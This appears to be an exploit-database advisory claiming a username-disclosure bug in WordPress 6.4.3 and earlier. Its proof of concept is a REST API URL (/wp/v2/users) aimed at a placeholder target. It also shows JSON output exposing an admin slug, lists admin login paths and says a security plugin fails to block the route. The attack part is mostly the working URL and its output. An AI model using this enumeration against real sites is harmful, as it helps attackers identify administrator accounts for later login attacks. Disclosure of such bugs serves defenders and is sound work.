WordPress 6.4.3 Username Disclosure

`# Title: wordpress 6.4.3 - Username Disclosure  
# Author: h4shur  
# date:2024-02-21  
# Vendor Homepage: https://www.wordpress.org  
# Software Link: https://www.wordpress.org/download  
# Version: 6.4.3 and earlier  
# Tested on: Windows 10 & Google Chrome  
# Category : Web Application Bugs  
  
### Description :  
the REST API allows simulating different request types. As such, we can  
perform a POST request with the “users” string in the body of the request,  
and tell the REST API to act like it’s received a GET request.  
You can see the management username in the "slug" feature. And even  
security plugins like "iThemes Security" do not block this path.  
  
  
### POC :  
https://target.com/wp-json/?rest_route=/wp/v2/users/  
  
# output :  
[{"id":1,"name":"admin","url":"https:\/\/target.com  
","description":"","link":"https:\/\/target.com  
\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/  
secure.gravatar.com  
\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/  
secure.gravatar.com  
\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/  
secure.gravatar.com  
\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/  
target.com  
\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/  
target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]  
  
  
### Admin Panel :  
https://target.com/wp-admin  
https://target.com/login.php  
  
  
### contact :  
[email protected]  
twitter.com/h4shur  
instagram.com/h4shur  
t.me/h4shur  
`